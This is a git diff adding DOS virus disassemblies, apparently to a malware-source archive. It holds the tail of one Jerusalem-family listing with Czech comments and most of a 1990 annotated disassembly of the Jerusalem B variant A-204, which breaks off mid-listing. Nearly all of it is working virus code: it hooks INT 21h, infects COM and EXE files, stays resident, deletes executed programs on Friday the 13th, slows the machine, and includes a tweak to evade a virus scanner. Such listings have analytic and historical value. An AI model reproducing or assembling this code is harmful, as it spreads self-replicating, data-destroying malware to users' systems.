atributy souboru. +45BD:031D CD21 INT 21 ; +45BD:031F B441 MOV AH,41 ; Vymaz +45BD:0321 CD21 INT 21 +45BD:0323 B8004B MOV AX,4B00 ; a vykonej. +45BD:0326 9D POPF +45BD:0327 2EFF2E1700 JMP FAR CS:[0017] ; FUNGUJE v patek 13. + ;============================================== +45BD:032C 2E803E0E0001 CMP Byte Ptr CS:[000E],01 ; LOAD & EXECUTE. +45BD:0332 74E4 JZ 0318 +45BD:0334 2EC7067000FFFF MOV Word Ptr CS:[0070],FFFF +45BD:033B 2EC7068F000000 MOV Word Ptr CS:[008F],0000 +45BD:0342 2E89168000 MOV CS:[0080],DX +45BD:0347 2E8C1E8200 MOV CS:[0082],DS +45BD:034C 50 PUSH AX +45BD:034D 53 PUSH BX +45BD:034E 51 PUSH CX +45BD:034F 52 PUSH DX +45BD:0350 56 PUSH SI +45BD:0351 57 PUSH DI +45BD:0352 1E PUSH DS +45BD:0353 06 PUSH ES +45BD:0354 FC CLD +45BD:0355 8BFA MOV DI,DX +45BD:0357 32D2 XOR DL,DL +45BD:0359 807D013A CMP Byte Ptr [DI+01],3A +45BD:035D 7505 JNZ 0364 ; +45BD:035F 8A15 MOV DL,[DI] ; Volny prostor na disku. +45BD:0361 80E21F AND DL,1F +45BD:0364 B436 MOV AH,36 +45BD:0366 CD21 INT 21 +45BD:0368 3DFFFF CMP AX,FFFF +45BD:036B 7503 JNZ 0370 +45BD:036D E97702 JMP 05E7 ;========================== +45BD:0370 F7E3 MUL BX ; Vypocet volneho prostoru. +45BD:0372 F7E1 MUL CX +45BD:0374 0BD2 OR DX,DX +45BD:0376 7505 JNZ 037D +45BD:0378 3D1007 CMP AX,0710 ; Je dost mista na VIRUS? +45BD:037B 72F0 JB 036D +45BD:037D 2E8B168000 MOV DX,CS:[0080] +45BD:0382 1E PUSH DS +45BD:0383 07 POP ES +45BD:0384 32C0 XOR AL,AL +45BD:0386 B94100 MOV CX,0041 +45BD:0389 F2 REPNZ ; Hledani konce retezce. +45BD:038A AE SCASB +45BD:038B 2E8B368000 MOV SI,CS:[0080] +45BD:0390 8A04 MOV AL,[SI] +45BD:0392 0AC0 OR AL,AL +45BD:0394 740E JZ 03A4 +45BD:0396 3C61 CMP AL,61 +45BD:0398 7207 JB 03A1 +45BD:039A 3C7A CMP AL,7A +45BD:039C 7703 JA 03A1 +45BD:039E 802C20 SUB Byte Ptr [SI],20 +45BD:03A1 46 INC SI +45BD:03A2 EBEC JMP 0390 +45BD:03A4 B90B00 MOV CX,000B +45BD:03A7 2BF1 SUB SI,CX +45BD:03A9 BF8400 MOV DI,0084 +45BD:03AC 0E PUSH CS +45BD:03AD 07 POP ES +45BD:03AE B90B00 MOV CX,000B +45BD:03B1 F3 REPZ ; VIRUS neinfikuje +45BD:03B2 A6 CMPSB ; COMMAND.COM +45E3:03B3 7503 JNZ 03B8 +45E3:03B5 E92F02 JMP 05E7 +45E3:03B8 B80043 MOV AX,4300 ; Zjisti atributy +45E3:03BB CD21 INT 21 ; souboru. +45E3:03BD 7205 JB 03C4 +45E3:03BF 2E890E7200 MOV CS:[0072],CX +45E3:03C4 7225 JB 03EB +45E3:03C6 32C0 XOR AL,AL +45E3:03C8 2EA24E00 MOV CS:[004E],AL +45E3:03CC 1E PUSH DS +45E3:03CD 07 POP ES +45E3:03CE 8BFA MOV DI,DX +45E3:03D0 B94100 MOV CX,0041 +45E3:03D3 F2 REPNZ +45E3:03D4 AE SCASB +45E3:03D5 807DFE4D CMP Byte Ptr [DI-02],4D ; Rozeznani COM +45E3:03D9 740B JZ 03E6 ; a EXE souboru. +45E3:03DB 807DFE6D CMP Byte Ptr [DI-02],6D +45E3:03DF 7405 JZ 03E6 +45E3:03E1 2EFE064E00 INC Byte Ptr CS:[004E] +45E3:03E6 B8003D MOV AX,3D00 ; Otevri soubor. +45E3:03E9 CD21 INT 21 +45E3:03EB 725A JB 0447 +45E3:03ED 2EA37000 MOV CS:[0070],AX +45E3:03F1 8BD8 MOV BX,AX +45E3:03F3 B80242 MOV AX,4202 ; Posun R/W pointer. +45E3:03F6 B9FFFF MOV CX,FFFF ; 5 byte od konce +45E3:03F9 BAFBFF MOV DX,FFFB ; souboru. +45E3:03FC CD21 INT 21 ;===================== +45E3:03FE 72EB JB 03EB +45E3:0400 050500 ADD AX,0005 +45E3:0403 2EA31100 MOV CS:[0011],AX +45E3:0407 B90500 MOV CX,0005 +45E3:040A BA6B00 MOV DX,006B ; Cti ze souboru +45E3:040D 8CC8 MOV AX,CS ; 5 byte (CS:6B) +45E3:040F 8ED8 MOV DS,AX +45E3:0411 8EC0 MOV ES,AX +45E3:0413 B43F MOV AH,3F +45E3:0415 CD21 INT 21 +45E3:0417 8BFA MOV DI,DX +45E3:0419 BE0500 MOV SI,0005 ; Rozpoznavaci kod je +45E3:041C F3 REPZ ; MsDos. +45E3:041D A6 CMPSB +45E3:041E 7507 JNZ 0427 +45E3:0420 B43E MOV AH,3E ; Soubor je nakazen. +45E3:0422 CD21 INT 21 +45E3:0424 E9C001 JMP 05E7 +45E3:0427 B82435 MOV AX,3524 +45E3:042A CD21 INT 21 +45E3:042C 891E1B00 MOV [001B],BX +45E3:0430 8C061D00 MOV [001D],ES +45E3:0434 BA1B02 MOV DX,021B +45E3:0437 B82425 MOV AX,2524 +45E3:043A CD21 INT 21 +45E3:043C C5168000 LDS DX,[0080] +45E3:0440 33C9 XOR CX,CX +45E3:0442 B80143 MOV AX,4301 +45E3:0445 CD21 INT 21 +45E3:0447 723B JB 0484 +45E3:0449 2E8B1E7000 MOV BX,CS:[0070] +45E3:044E B43E MOV AH,3E +45E3:0450 CD21 INT 21 +45E3:0452 2EC7067000FFFF MOV Word Ptr CS:[0070],FFFF +45E3:0459 B8023D MOV AX,3D02 +45E3:045C CD21 INT 21 +45E3:045E 7224 JB 0484 +45E3:0460 2EA37000 MOV CS:[0070],AX +45E3:0464 8CC8 MOV AX,CS +45E3:0466 8ED8 MOV DS,AX +45E3:0468 8EC0 MOV ES,AX +45E3:046A 8B1E7000 MOV BX,[0070] +45E3:046E B80057 MOV AX,5700 +45E3:0471 CD21 INT 21 +45E3:0473 89167400 MOV [0074],DX +45E3:0477 890E7600 MOV [0076],CX +45E3:047B B80042 MOV AX,4200 +45E3:047E 33C9 XOR CX,CX +45E3:0480 8BD1 MOV DX,CX +45E3:0482 CD21 INT 21 +45E3:0484 723D JB 04C3 +45E3:0486 803E4E0000 CMP Byte Ptr [004E],00 +45E3:048B 7403 JZ 0490 +45E3:048D EB57 JMP 04E6 +45E3:048F 90 NOP +45E3:0490 BB0010 MOV BX,1000 +45E3:0493 B448 MOV AH,48 +45E3:0495 CD21 INT 21 +45E3:0497 730B JNB 04A4 +45E3:0499 B43E MOV AH,3E +45E3:049B 8B1E7000 MOV BX,[0070] +45E3:049F CD21 INT 21 +45E3:04A1 E94301 JMP 05E7 +45E3:04A4 FF068F00 INC Word Ptr [008F] +45E3:04A8 8EC0 MOV ES,AX +45E3:04AA 33F6 XOR SI,SI +45E3:04AC 8BFE MOV DI,SI +45E3:04AE B91007 MOV CX,0710 +45E3:04B1 F3 REPZ +45E3:04B2 A4 MOVSB +45E3:04B3 8BD7 MOV DX,DI +45E3:04B5 8B0E1100 MOV CX,[0011] +45E3:04B9 8B1E7000 MOV BX,[0070] +45E3:04BD 06 PUSH ES +45E3:04BE 1F POP DS +45E3:04BF B43F MOV AH,3F +45E3:04C1 CD21 INT 21 +45E3:04C3 721C JB 04E1 +45E3:04C5 03F9 ADD DI,CX +45E3:04C7 33C9 XOR CX,CX +45E3:04C9 8BD1 MOV DX,CX +45E3:04CB B80042 MOV AX,4200 +45E3:04CE CD21 INT 21 +45E3:04D0 BE0500 MOV SI,0005 +45E3:04D3 B90500 MOV CX,0005 +45E3:04D6 F3 REPZ +45E3:04D7 2EA4 MOVSB CS: +45E3:04D9 8BCF MOV CX,DI +45E3:04DB 33D2 XOR DX,DX +45E3:04DD B440 MOV AH,40 +45E3:04DF CD21 INT 21 +45E3:04E1 720D JB 04F0 +45E3:04E3 E9BC00 JMP 05A2 +45E3:04E6 B91C00 MOV CX,001C +45E3:04E9 BA4F00 MOV DX,004F +45E3:04EC B43F MOV AH,3F +45E3:04EE CD21 INT 21 +45E3:04F0 724A JB 053C +45E3:04F2 C70661008419 MOV Word Ptr [0061],1984 +45E3:04F8 A15D00 MOV AX,[005D] +45E3:04FB A34500 MOV [0045],AX +45E3:04FE A15F00 MOV AX,[005F] +45E3:0501 A34300 MOV [0043],AX +45E3:0504 A16300 MOV AX,[0063] +45E3:0507 A34700 MOV [0047],AX +45E3:050A A16500 MOV AX,[0065] +45E3:050D A34900 MOV [0049],AX +45E3:0510 A15300 MOV AX,[0053] +45E3:0513 833E510000 CMP Word Ptr [0051],+00 +45E3:0518 7401 JZ 051B +45E3:051A 48 DEC AX +45E3:051B F7267800 MUL Word Ptr [0078] +45E3:051F 03065100 ADD AX,[0051] +45E3:0523 83D200 ADC DX,+00 +45E3:0526 050F00 ADD AX,000F +45E3:0529 83D200 ADC DX,+00 +45E3:052C 25F0FF AND AX,FFF0 +45E3:052F A37C00 MOV [007C],AX +45E3:0532 89167E00 MOV [007E],DX +45E3:0536 051007 ADD AX,0710 +45E3:0539 83D200 ADC DX,+00 +45E3:053C 723A JB 0578 +45E3:053E F7367800 DIV Word Ptr [0078] +45E3:0542 0BD2 OR DX,DX +45E3:0544 7401 JZ 0547 +45E3:0546 40 INC AX +45E3:0547 A35300 MOV [0053],AX +45E3:054A 89165100 MOV [0051],DX +45E3:054E A17C00 MOV AX,[007C] +45E3:0551 8B167E00 MOV DX,[007E] +45E3:0555 F7367A00 DIV Word Ptr [007A] +45E3:0559 2B065700 SUB AX,[0057] +45E3:055D A36500 MOV [0065],AX +45E3:0560 C7066300C500 MOV Word Ptr [0063],00C5 +45E3:0566 A35D00 MOV [005D],AX +45E3:0569 C7065F001007 MOV Word Ptr [005F],0710 +45E3:056F 33C9 XOR CX,CX +45E3:0571 8BD1 MOV DX,CX +45E3:0573 B80042 MOV AX,4200 +45E3:0576 CD21 INT 21 +45E3:0578 720A JB 0584 +45E3:057A B91C00 MOV CX,001C +45E3:057D BA4F00 MOV DX,004F +45E3:0580 B440 MOV AH,40 +45E3:0582 CD21 INT 21 +45E3:0584 7211 JB 0597 +45E3:0586 3BC1 CMP AX,CX +45E3:0588 7518 JNZ 05A2 +45E3:058A 8B167C00 MOV DX,[007C] +45E3:058E 8B0E7E00 MOV CX,[007E] +45E3:0592 B80042 MOV AX,4200 +45E3:0595 CD21 INT 21 +45E3:0597 7209 JB 05A2 +45E3:0599 33D2 XOR DX,DX +45E3:059B B91007 MOV CX,0710 +45E3:059E B440 MOV AH,40 +45E3:05A0 CD21 INT 21 +45E3:05A2 2E833E8F0000 CMP Word Ptr CS:[008F],+00 +45E3:05A8 7404 JZ 05AE +45E3:05AA B449 MOV AH,49 +45E3:05AC CD21 INT 21 +45E3:05AE 2E833E7000FF CMP Word Ptr CS:[0070],-01 +45E3:05B4 7431 JZ 05E7 +45E3:05B6 2E8B1E7000 MOV BX,CS:[0070] +45E3:05BB 2E8B167400 MOV DX,CS:[0074] +45E3:05C0 2E8B0E7600 MOV CX,CS:[0076] +45E3:05C5 B80157 MOV AX,5701 +45E3:05C8 CD21 INT 21 +45E3:05CA B43E MOV AH,3E +45E3:05CC CD21 INT 21 +45E3:05CE 2EC5168000 LDS DX,CS:[0080] +45E3:05D3 2E8B0E7200 MOV CX,CS:[0072] +45E3:05D8 B80143 MOV AX,4301 +45E3:05DB CD21 INT 21 +45E3:05DD 2EC5161B00 LDS DX,CS:[001B] +45E3:05E2 B82425 MOV AX,2524 +45E3:05E5 CD21 INT 21 +45E3:05E7 07 POP ES +45E3:05E8 1F POP DS +45E3:05E9 5F POP DI +45E3:05EA 5E POP SI +45E3:05EB 5A POP DX +45E3:05EC 59 POP CX +45E3:05ED 5B POP BX +45E3:05EE 58 POP AX +45E3:05EF 9D POPF +45E3:05F0 2EFF2E1700 JMP FAR CS:[0017] +45E3:05F0 00 00 00-00 00 00 00 00 00 00 00 ........... +45E3:0600 F2 13 50 43 54 4F 4F 4C-53 2E 45 58 45 00 22 2F r.PCTOOLS.EXE."/ +45E3:0610 01 FE 0D 00 8B 00 F0 F0-83 F2 F4 03 00 0F 00 00 .~....pp.rt..... +45E3:0620 4D FE 0D 04 00 45 43 3D-43 3A 5C 43 4F 4D 4D 41 M~...EC=C:\COMMA +45E3:0630 00 47 02 00 00 32 00 FF-FF FF FF FF FF FF FF FF .G...2.......... +45E3:0640 FF FF FF FF FF FF FF FF-FF 43 3A 5C 5A 53 53 52 .........C:\ZSSR +45E3:0650 5C 4B 41 4C 49 42 52 5C-4B 41 49 4B 49 2E 42 41 \KALIBR\KAIKI.BA +45E3:0660 54 00 6B 61 69 6B 69 0D-00 FF FF FF 00 00 00 00 T.kaiki......... +45E3:0670 4D FE 0D 00 10 M~... +45E3:0670 00 00 00-00 00 00 00 00 00 00 00 ........... +45E3:0680 E9 92 00 73 55 4D 73 44-6F 73 00 01 77 i..sUMsDos \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.j_a204.asm b/MSDOS/Virus.MSDOS.Unknown.j_a204.asm new file mode 100644 index 00000000..238195e6 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.j_a204.asm @@ -0,0 +1,977 @@ + Virus : Jerusalem Version B Variant A-204 +Disassembled by : Righard Zwienenberg + Steenwijklaan 302 + 2541 RT The Hague + The Netherlands + Data : +31-70-3898822, V22,V22b,HST,MNP,CM + Voive : +31-70-3675379 +FidoNet address : 2:512/2.3 + Used Software : ASMGEN, DEBUG and D86-Disassembler + Date : 20 june 1990 + +Note : All Values are hex. If a value is followd by d (e.g. 30d) it means +30 decimal. + +Note : This disassembly consists of two programs. The original program was +a dummy file (20h bytes long) containing 1Fh times 90 RET and 01h time +C3 RET. + +0100 E9 92 00 JMP 0195 ; JUMP -> 0195h + +0103 db 2A,41,2D,32,30,34,2A ; *A-204* never used + +010A dw 00 01 ; Startaddress original program +010C dw 01 56 ; Startaddress-offset original program +010E db 00 ; Trigger for destruction (delete file) + ; Always zero, but if it is Friday the 13th and the year is + ; not equal 1987 this byte is set to one +010F dw 00 00 ; Storing place for original AX (read-only word) +0111 dw 20 00 ; Length of Original Program (0020h) +0113 dw A5 FE ; Storing place for original BX of INT 08h vector +0115 dw 00 F0 ; Storing place for original ES of INT 08h vector +0117 dw 60 14 ; Storing place for original BX of INT 21h vector +0119 dw 2B 02 ; Storing place for original ES of INT 21h vector +011B dw 56 05 ; Storing place for original BX of INT 24h vector +011D dw DE 0C ; Storing place for original ES of INT 24h vector +011F dw 40 7E ; Storing place for timer for 30 minutes trigger + ; By init. set to 7E90h + + ; The following words are never used by the virus. The are used + ; by a routine starting at 0398h which is executed when INT 21h + ; is called with AH=DEh. This never happens in the code. +0121 dw 00 00 ; +0123 dw 00 00 ; +0125 dw 00 00 ; +0127 dw 00 00 ; +0129 dw 00 00 ; +012B dw 00 00 ; +012D dw 00 E8 ; +012F dw 06 EC ; + +0131 dw 91 16 ; Storing place for original ES +0133 dw 80 00 ; Storing place for BX. Never read again + +0135 00 00 00 80 00 + +0139 dw 91 16 ; Storing place for original ES + +013B 5C 00 + +013D dw 91 16 ; Storing place for original ES + +013F 6C 00 ; + +0141 dw 91 16 ; Temp. storing place for original ES +0143 dw 00 20 ; Temp. storing place for AX +0145 dw 0D 1F ; Temp. storing place for ES+10h +0147 dw 5F 21 ; Storing place for AX +0149 dw A1 16 ; Temp. storing place for ES+10h +014B dw 00 F0 ; Temp. storing place for AX +014D db 02 ; Temp. storing place for AL +014E db 00 ; COM/EXE indicator + ; 0 = EXE-File + ; 1 = COM-File +0151 dw 30 01 ; Temp. storing place for DX +0153 dw 23 00 ; Temp. storing place for AX + +0155 20 01 + +0157 dw 4A 00 ; Read Only!!! The code only read this word to substract it + ; from AX + +0159 D4 06 D4 06 + +015D dw 98 03 ; Temp. Storing place to store AX +015F dw 10 07 ; Probably startaddress of virus in mem +0161 dw 84 19 ; Never used!!! 1984h is stored here by the code +0163 dw C5 00 ; 00C5h is being read and put back later by the code +0165 dw 99 03 ; Temp. storing place for AX + +0167 1C 00 00 00 90 90 90 90 C3 + +0170 dw 05 00 ; Storing place for file handle (BX) +0172 dw 20 00 ; Storing place for file attributes + ; bit 0 = read only + ; bit 1 = hidden file + ; bit 2 = system file + ; bit 3 = volume label + ; bit 4 = subdirectory + ; bit 5 = archive bit + ; bit 8 = shareable (Novell Network) +0174 dw D5 14 ; Storing place for file date (DX) +0176 dw 99 83 ; Storing place for file time (CX) +0178 dw 00 02 ; 0200h=512d Used as multiplier/divider +017A dw 10 00 ; 0001h= 1d Used as multiplier/divider +017C dw 20 3E ; Temp. storing place for AX +017E dw 00 00 ; Temp. storing place for DX +0180 dw B9 42 ; Storing place for DX of ASCIZ-Filename +0182 dw 1A 9B ; Storing place for DS of ASCIZ-Filename + +0184 db 43,4F,4D,4D,41,4E,44,2E,43,4F,4D ; COMMAND.COM + ; May not become infected + +018F dw 01 00 ; Storing place for variable-result of free-memory-scan + ; 0000h : not enough memory available + ; 0001h : enough memory available + +0191 00 00 00 00 + +0195 FC CLD ; Clear Direct +0196 B4 E0 MOV AH,0E0 ; This is the check if the +0198 CD 21 INT 021 ; virus is already active + ; in memory. INT 21h with + ; AH=E0h will return AX=0300h + ; if the virus is active. +019A 80 FC E0 CMP AH,0E0 ; AH>=E0h? +019D 73 16 JAE 01B5 ; Yes: -> 01B5h +019F 80 FC 03 CMP AH,3 ; AH<-03h? +01A2 72 11 JB 01B5 ; Yes: -> 01B5h + ; INT 21h with AH= + ; DDh,DEh,E0h + ; are self-defined. + + ; SetUp for + ; Executing original program + ; We come here if an infected + ; program is executed and the + ; virus is already active in + ; memory. +01A4 B4 DD MOV AH,0DD ; +01A6 BF 00 01 MOV DI,0100 ; Destination Index = 0100h +01A9 BE 10 07 MOV SI,0710 ; Source Index = 0710h +01AC 03 F7 ADD SI,DI ; Source Index:= 0810h + ; At this place the original + ; Program is located +01AE 2E 8B 8D 11 00 CS MOV CX,W[DI+011]; CX=20h (length original + ; Program) +01B3 CD 21 INT 021 ; + + ; Here we come when the virus + ; is not yet in memory +01B5 8C C8 MOV AX,CS ; AX=Code Segment +01B7 05 10 00 ADD AX,010 ; AX:=AX+10h +01BA 8E D0 MOV SS,AX ; Stack Segment:=AX +01BC BC 00 07 MOV SP,0700 ; StackPointer = 0700h +01BF 50 PUSH AX ; Store AX +01C0 B8 C5 00 MOV AX,0C5 ; AX = C5h +01C3 50 PUSH AX ; Store AX +01C4 CB RETF ; -> C5h + +01C5 FC CLD ; Clear Direct +01C6 06 PUSH ES ; Store ES +01C7 2E 8C 06 31 00 CS MOV W[031],ES ; Store ES +01CC 2E 8C 06 39 00 CS MOV W[039],ES ; in storage places +01D1 2E 8C 06 3D 00 CS MOV W[03D],ES ; +01D6 2E 8C 06 41 00 CS MOV W[041],ES ; +01DB 8C C0 MOV AX,ES ; AX=ES +01DD 05 10 00 ADD AX,010 ; AX=AX+10h +01E0 2E 01 06 49 00 CS ADD W[049],AX ; Add AX (ES+10h) to 0149h +01E5 2E 01 06 45 00 CS ADD W[045],AX ; and 0145h +01EA B4 E0 MOV AH,0E0 ; AH=E0h (Self defined) +01EC CD 21 INT 021 ; CALL INT 21h + +01EE 80 FC E0 CMP AH,0E0 ; AH>=0Eh? +01F1 73 13 JAE 0206 ; Yes: -> 0206 +01F3 80 FC 03 CMP AH,3 ; AH=03h? Must be if the + ; viruscode is in memory + ; and interrupt 21h is called + ; with AH=E0h. + +01F6 07 POP ES ; Restore original ES +01F7 2E 8E 16 45 00 CS MOV SS,W[045] ; SS=ES+10h +01FC 2E 8B 26 43 00 CS MOV SP,W[043] ; +0201 2E FF 2E 47 00 CS JMP D[047] ; + +0206 33 C0 XOR AX,AX ; AX=0000h +0208 8E C0 MOV ES,AX ; ES=0000h +020A 26 A1 FC 03 ES MOV AX,W[03FC] + + ; Here the A-204 variant + ; differs for the first + ; time from the original + ; Jerusalem Version B virus. +020E 26 A0 FE 03 ES MOV AL,B[03FE] ; These two line have been +0212 2E A3 4B 00 CS MOV W[04B],AX ; changed in order + ; to avoid being + ; detected by ViruScan from + ; John McAfee. + +0216 2E A2 4D 00 CS MOV B[04D],AL +021A 26 C7 06 FC 03 F3 A5 ES MOV W[03FC],0A5F3 +0221 26 C6 06 FE 03 CB ES MOV B[03FE],0CB +0227 58 POP AX +0228 05 10 00 ADD AX,010 +022B 8E C0 MOV ES,AX +022D 0E PUSH CS ; Store CS +022E 1F POP DS ; DS=CS +022F B9 10 07 MOV CX,0710 ; CX=0710h +0232 D1 E9 SHR CX,1 ; CX >> 1 (CX:=0308h) +0234 33 F6 XOR SI,SI ; SI=0000h +0236 8B FE MOV DI,SI ; DI=0000h +0238 06 PUSH ES ; Store ES +0239 B8 42 01 MOV AX,0142 ; AX=0142h +023C 50 PUSH AX ; Store AX +023D EA FC 03 00 00 JMP 0:03FC + +0242 8C C8 MOV AX,CS ; AX=CS +0244 8E D0 MOV SS,AX ; SS=CS +0246 BC 00 07 MOV SP,0700 ; SP=0700h +0249 33 C0 XOR AX,AX ; AX=0000h +024B 8E D8 MOV DS,AX ; DS=0000h +024D 2E A1 4B 00 CS MOV AX,W[04B] ; Restore AX +0251 A3 FC 03 MOV W[03FC],AX ; Store AX +0254 2E A0 4D 00 CS MOV AL,B[04D] ; Restore AL +0258 A2 FE 03 MOV B[03FE],AL ; Store AL +025B 8B DC MOV BX,SP ; BX=SP +025D B1 04 MOV CL,4 ; CL=04h +025F D3 EB SHR BX,CL ; BX >> 4 +0261 83 C3 10 ADD BX,010 ; BX=BX+10h +0264 2E 89 1E 33 00 CS MOV W[033],BX ; Store BX. Why I don't know, + ; the storing place is never + ; read again +0269 B4 4A MOV AH,04A ; +026B 2E 8E 06 31 00 CS MOV ES,W[031] ; Restore ES +0270 CD 21 INT 021 ; Adjust Memory Block Size + ; (SETBLOCK) + +0272 B8 21 35 MOV AX,03521 ; Get original INT 21h +0275 CD 21 INT 021 ; vector + +0277 2E 89 1E 17 00 CS MOV W[017],BX ; Store BX and ES of INT 21h +027C 2E 8C 06 19 00 CS MOV W[019],ES ; vector +0281 0E PUSH CS ; Store CS +0282 1F POP DS ; DS=CS +0283 BA 5B 02 MOV DX,025B ; DX=025Bh +0286 B8 21 25 MOV AX,02521 ; Set new INT 21h +0289 CD 21 INT 021 ; vector on DS:025Bh + +028B 8E 06 31 00 MOV ES,W[031] ; Restore original ES +028F 26 8E 06 2C 00 ES MOV ES,W[02C] ; +0294 33 FF XOR DI,DI ; DI=0000h +0296 B9 FF 7F MOV CX,07FFF ; CX=7FFFh +0299 32 C0 XOR AL,AL ; AL=0000h +029B F2 AE REPNE SCASB ; +029D 26 38 05 ES CMP B[DI],AL ; +02A0 E0 F9 LOOPNE 029B ; No Flags: DEC CX -> 02A2h + ; IF CX<>0 and not equal + ; -> 029B +02A2 8B D7 MOV DX,DI ; DX=DI +02A4 83 C2 03 ADD DX,3 ; DX=DX+03h +02A7 B8 00 4B MOV AX,04B00 ; AX=4B00h +02AA 06 PUSH ES ; Store ES +02AB 1F POP DS ; Restore DS (DS:=ES) +02AC 0E PUSH CS ; Store CS +02AD 07 POP ES ; Restore ES (ES:=CS) +02AE BB 35 00 MOV BX,035 ; BX=35h +02B1 1E PUSH DS ; Store Registers +02B2 06 PUSH ES +02B3 50 PUSH AX +02B4 53 PUSH BX +02B5 51 PUSH CX +02B6 52 PUSH DX + +02B7 B4 2A MOV AH,02A ; Get Current Date +02B9 CD 21 INT 021 ; DL=day + ; DH=month + ; CX=year + ; AL=Day of the week + +02BB 2E C6 06 0E 00 00 CS MOV B[0E],0 ; Set Trigger for deleting + ; infected files to 00h +02C1 81 F9 C3 07 CMP CX,07C3 ; Is year 1987 ? +02C5 74 30 JE 02F7 ; Yes: -> 02F7h +02C7 3C 05 CMP AL,5 ; Is it Friday ? +02C9 75 0D JNE 02D8 ; No: -> 02D8h +02CB 80 FA 0D CMP DL,0D ; Is it 13th ? +02CE 75 08 JNE 02D8 ; No: -> 02D8h + ; Yes: it is Friday + ; the 13th and the + ; year is not equal 1987 +02D0 2E FE 06 0E 00 CS INC B[0E] ; Set Trigger for deleting + ; infected files to 01h +02D5 EB 20 JMP 02F7 ; JUMP -> 02F7h + +02D7 90 NOP + +02D8 B8 08 35 MOV AX,03508 ; Get original INT 8h +02DB CD 21 INT 021 ; vector + +02DD 2E 89 1E 13 00 CS MOV W[013],BX ; Store original BX +02E2 2E 8C 06 15 00 CS MOV W[015],ES ; and ES of INT 08h vector +02E7 0E PUSH CS +02E8 1F POP DS +02E9 C7 06 1F 00 90 7E MOV W[01F],07E90 ; Store 30d minutes into + ; timer interrupt. This + ; value is decreased by + ; one 18.2 times per second +02EF B8 08 25 MOV AX,02508 ; Set new INT 8h vector +02F2 BA 1E 02 MOV DX,021E ; to DS:021Eh +02F5 CD 21 INT 021 ; + +02F7 5A POP DX ; Restore Registers +02F8 59 POP CX +02F9 5B POP BX +02FA 58 POP AX +02FB 07 POP ES +02FC 1F POP DS +02FD 9C PUSHF ; Store Flags +02FE 2E FF 1E 17 00 CS CALL D[017] ; Call original INT 21h + ; address + +0303 1E PUSH DS ; Restore DS +0304 07 POP ES ; Store ES +0305 B4 49 MOV AH,049 ; Free Memory +0307 CD 21 INT 021 ; + +0309 B4 4D MOV AH,04D ; Get ExitCode of +030B CD 21 INT 021 ; SubProgram (WAIT) + ; Stored in AL + +030D B4 31 MOV AH,031 ; AX=31[AL]h +030F BA 00 06 MOV DX,0600 ; DX=600h +0312 B1 04 MOV CL,4 ; CL=04h +0314 D3 EA SHR DX,CL ; DX >> 4 (DX=60H) +0316 83 C2 10 ADD DX,010 ; DX=DX+10h (DX=70h) + ; Program Size in Paragraphs + ; is 70h Bytes +0319 CD 21 INT 021 ; Terminate but Stay Resident + +031B 32 C0 XOR AL,AL ; Clear AL +031D CF IRET ; Interrupt Return + + ; 031Eh is the new INT 08h + ; vector. This routine is + ; called 18.2 times per + ; second +031E 2E 83 3E 1F 00 02 CS CMP W[01F],2 ; Timer decreased til 02h? +0324 75 17 JNE 033D ; No: -> 033D + + ; Yes: now 32 minutes are + ; passed since infection +0326 50 PUSH AX ; Store Registers +0327 53 PUSH BX +0328 51 PUSH CX +0329 52 PUSH DX +032A 55 PUSH BP + +032B B8 02 06 MOV AX,0602 ; Scroll box with coordinates +032E B7 87 MOV BH,087 ; (5h,5h),(10h,10h) two +0330 B9 05 05 MOV CX,0505 ; lines upwards +0333 BA 10 10 MOV DX,01010 ; +0336 CD 10 INT 010 ; + +0338 5D POP BP ; Restore Registers +0339 5A POP DX +033A 59 POP CX +033B 5B POP BX +033C 58 POP AX +033D 2E FF 0E 1F 00 CS DEC W[01F] ; Decrease Timer-Trigger + ; This now becomes 01h +0342 75 12 JNE 0356 ; If 0: -> 0356h +0344 2E C7 06 1F 00 01 00 CS MOV W[01F],1 ; Timer-Trigger set to 01h +034B 50 PUSH AX ; Store AX +034C 51 PUSH CX ; Store CX +034D 56 PUSH SI ; Store SI +034E B9 01 40 MOV CX,04001 ; CX=4001h +0351 F3 AC REP LODSB ; Load byte [SI] into AL and + ; advance SI, done CX times. + ; This is the routine which + ; decreases the speed of the + ; machine til 1/5th of the + ; original. 32 minutes after + ; infection this routine is + ; executes 18.2 times a second +0353 5E POP SI ; Restore SI +0354 59 POP CX ; Restore CX +0355 58 POP AX ; Restore AX +0356 2E FF 2E 13 00 CS JMP D[013] ; Jump to original INT 08h + ; address + + ; Here we come if INT 21h is + ; called +035B 9C PUSHF ; Store Flags +035C 80 FC E0 CMP AH,0E0 ; AH=0Eh ? +035F 75 05 JNE 0366 ; No: -> 0366h +0361 B8 00 03 MOV AX,0300 ; AX=0300h +0364 9D POPF ; Restore Flags +0365 CF IRET ; Interrupt Return + +0366 80 FC DD CMP AH,0DD ; AH=DDh? +0369 74 13 JE 037E ; Yes: -> 037Eh +036B 80 FC DE CMP AH,0DE ; AH=DEh? +036E 74 28 JE 0398 ; Yes: -> 0398h + ; INT 21h is never called + ; with AH=DEh. So the routine + ; at 0398h is never used + ; (seems) + +0370 3D 00 4B CMP AX,04B00 ; Load & Execute ? +0373 75 03 JNE 0378 ; No: -> 0378h +0375 E9 B4 00 JMP 042C ; Yes: -> 042Ch +0378 9D POPF ; Restore Flags +0379 2E FF 2E 17 00 CS JMP D[017] ; Jmp to original + ; INT 21h address + + ; Execute original program +037E 58 POP AX +037F 58 POP AX ; Restore AX +0380 B8 00 01 MOV AX,0100 ; AX=0100h +0383 2E A3 0A 00 CS MOV W[0A],AX ; Store AX +0387 58 POP AX ; Restore AX +0388 2E A3 0C 00 CS MOV W[0C],AX ; Store AX +038C F3 A4 REP MOVSB ; +038E 9D POPF ; Restore Flags +038F 2E A1 0F 00 CS MOV AX,W[0F] ; AX=0000h +0393 2E FF 2E 0A 00 CS JMP D[0A] ; JUMP -> CS:0100h + ; This executes the original + ; program + + + ; This routine is called + ; when INT 21h with AH=DEh + ; is called which never + ; happens in the code. I + ; have to investigate it + ; a bit more. Til then + ; it remains without comments. +0398 83 C4 06 ADD SP,6 +039B 9D POPF +039C 8C C8 MOV AX,CS +039E 8E D0 MOV SS,AX +03A0 BC 10 07 MOV SP,0710 +03A3 06 PUSH ES +03A4 06 PUSH ES +03A5 33 FF XOR DI,DI +03A7 0E PUSH CS +03A8 07 POP ES +03A9 B9 10 00 MOV CX,010 +03AC 8B F3 MOV SI,BX +03AE BF 21 00 MOV DI,021 +03B1 F3 A4 REP MOVSB +03B3 8C 